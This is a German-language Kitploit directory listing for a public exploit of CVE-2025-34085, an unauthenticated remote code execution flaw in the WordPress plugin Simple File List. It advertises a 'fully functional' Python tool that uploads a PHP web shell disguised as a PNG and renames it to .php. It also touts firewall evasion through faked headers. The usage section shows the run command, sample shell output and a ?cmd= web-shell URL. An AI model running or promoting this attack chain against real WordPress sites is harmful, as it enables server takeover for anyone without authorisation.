Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-34085 — Simple File List – RCE-Exploit ohne Authentifizierung (CVE-2025-34085) | Kitploit
Tools/GitHubGitHub/mrjhaxcore/cve-2025-34085
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubmrjhaxcore/cve-2025-34085

CVE-2025-34085

Simple File List – RCE-Exploit ohne Authentifizierung (CVE-2025-34085)

Repository anzeigen
12vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

📂 Simple File List – Authentifizierungsfreier RCE-Exploit (CVE-2025-34085)

⚠️ Exploit-Code von: Mrj Haxcore

Ein voll funktionsfähiger Python-Exploit für das WordPress-Plugin Simple File List (<= 4.2.3), das aufgrund unsicherer Datei-Upload- und Umbenennungslogik anfällig für authentifizierungsfreie Remote-Code-Ausführung (RCE) ist.


💣 Zusammenfassung der Schwachstelle

  • Plugin: Simple File List (simple-file-list)
  • Version: <= 4.2.3
  • CVE: CVE-2025-34085
  • Auswirkung: Nicht authentifizierte Benutzer können eine als .png getarnte PHP-Datei hochladen, sie in .php umbenennen und beliebigen Code ausführen.
  • Voraussetzungen: Keine Authentifizierung erforderlich
  • Exploit-Typ: Datei-Upload → Umgehung durch Umbenennung → Befehlsausführung

✅ Funktionen

  • 🚀 Vollautomatische Exploit-Kette
  • 📤 Manueller multipart/form-data-Builder (umgeht 415)
  • 🔁 Brute-Force-Umbenennung für .php, .php5, .phtml usw.
  • 🛡️ Realistische, gefälschte Header zur Umgehung von WAFs
  • 🐚 Befehlsausführung via ?cmd=
  • 🧼 Saubere Ausgabe (kein �PNG-Müll)

🛠 Verwendung

root@kitploit:~
python3 simple.py https://ziel.seite

[+] Shell wird als 8dkls0qp.png hochgeladen...
[+] Hochladen erfolgreich.
[+] Versuche, in 8dkls0qp.php umzubenennen...
[+] Umbenennung erfolgreich: 8dkls0qp.php
[+] Shell wird ausgelöst: https://ziel.seite/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell-Ausgabe:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Manueller Aufruf

https://ziel.seite/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami
Tool herunterladen